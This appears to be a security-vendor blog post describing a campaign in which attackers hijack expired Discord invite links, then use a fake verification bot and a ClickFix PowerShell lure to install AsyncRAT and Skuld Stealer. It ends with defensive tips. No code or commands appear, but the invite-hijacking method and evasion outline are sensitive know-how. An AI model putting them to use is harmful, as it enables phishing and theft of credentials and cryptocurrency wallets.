Attacks via Discord: The dark side of invitations

Discord is a widely used and trusted platform preferred by gamers, communities, businesses, and others who need to connect securely and quickly. In a recent investigation, Check Point Research (CPR) uncovered a flaw in Discord's invitation system that allows attackers to hijack expired or deleted invitation links and secretly redirect unsuspecting users to malicious servers. Invitation links posted by trusted communities months ago on forums, social media or official websites could now silently lead users into the hands of cybercriminals.

Check Point Research (CPR) observed real-world attacks in which threat actors leveraged compromised links to deploy sophisticated phishing and malware campaigns. These included multi-stage infections that evaded detection by antivirus tools and sandbox controls, ultimately delivering malware such as AsyncRAT and Skuld Stealer. Below is a detailed analysis of the attack and practical advice on how to protect the public from such attacks.

The Hidden Danger in Discord Invite Links

Discord offers several types of invite links: temporary, permanent, and custom (customised) links. Temporary links expire after a set period of time, permanent links never expire, and custom links are custom URLs available only on servers with premium status (Level 3 Boost). Our research revealed that attackers can exploit the way Discord handles expired or deleted invitation codes — especially vanity links. When a custom invite link expires or a server loses its boosted status, the invite code can become available again. Attackers can then claim the same code and redirect users to a malicious server.

In many cases, users encounter these links in old, trusted sources and have no reason to suspect that anything is wrong. To make matters worse, the Discord app sometimes gives users the false impression that temporary links have become permanent, which contributes to an increase in codes that can be compromised.

From Trusted Links to Malicious Servers

Once an invite link is compromised, attackers redirect users to malicious servers that mimic Discord's legitimate servers. Newcomers usually find that most channels are locked, except for one called ‘verification.’ Here, a fake bot named ‘Safeguard’ asks users to complete a verification step.

Clicking on ‘verification’ initiates an OAuth2 flow and redirects users to a phishing website that closely resembles Discord. The website downloads a malicious PowerShell command to the clipboard and guides users through a fake verification process. This technique, known as ‘ClickFix,’ tricks users into executing the command via the Windows ‘Run’ dialogue box.

Once executed, the PowerShell script downloads additional components from Pastebin and GitHub, initiating a multi-stage infection chain. Ultimately, the system is infected with payloads such as AsyncRAT, which gives attackers remote control, and Skuld Stealer, which targets browser credentials and cryptocurrency wallets.

An Expanding and Evolving Campaign

This campaign is not static. We have seen the attackers periodically update their downloader to maintain a zero detection rate on VirusTotal. We also identified a parallel campaign targeting gamers. Here, the initial loader was embedded in a Trojanised cheat tool for The Sims 4, demonstrating the attackers' flexibility in targeting different user groups.

Impact and Scope

The exact number of victims is difficult to determine due to the covert use of Discord webhooks to extract data. However, download statistics from the repositories used in the campaign indicate over 1,300 downloads. Victims were scattered across the globe, including the US, Vietnam, France, Germany, the UK, and other countries.

The focus on stealing credentials and cryptocurrency wallet data suggests a clear financial motive behind the attack.

A Trusted Platform Turned Trojan Horse

This campaign shows how a subtle feature of Discord's invitation system can be turned into a weapon. By compromising trusted links, attackers created an effective attack chain that combined social engineering with the abuse of legitimate services such as GitHub, Bitbucket, and Pastebin.

Rather than using heavy obfuscation, the threat actors relied on simpler, more stealthy techniques such as behaviour-based execution, scheduled tasks, and delayed payload decryption.

This campaign highlights the increasing complexity of social engineering attacks that violate user trust. Instead of relying on heavily obfuscated malware, the attackers used legitimate services and simple behavioural tricks to avoid detection, showing how easily popular platforms can be manipulated when basic functions — such as invitation link management — remain insecure.

Discord has since disabled the malicious bot used in this campaign, but the basic tactics remain viable. Attackers can easily register new bots or change vectors while continuing to exploit the invite system.

Stay protected

1. Double-check invite links — Always check Discord invite URLs before clicking. If a link comes from an old source (e.g., a forum post or tweet), verify its legitimacy first.

2. Prefer permanent invite links - When managing your own Discord servers, create permanent (non-expiring) invite links. Avoid publicly posting temporary invites.

3. Check for the ‘Verified App’ badge before authorising bots - Only interact with bots that display Discord's official ‘Verified App’ badge. Unverified bots may be malicious.

4. Never execute unknown commands - No legitimate Discord server or verification process should ever require you to execute PowerShell commands or paste anything into your system terminal. Stop and investigate if you are asked to do so.

5. Adopt multi-layered defences - For organisations, combine security awareness training with endpoint protection, phishing detection and browser security tools that can stop threats before they are executed.

6. Leverage proactive protection: Check Point Threat Emulation provides real-time prevention against advanced malware, phishing tactics and file-based threats, such as those used in this campaign, across web, email and collaboration tools. Behavioural analysis and sandboxing capabilities offer critical protection against evolving social engineering attacks and multi-stage malware attacks.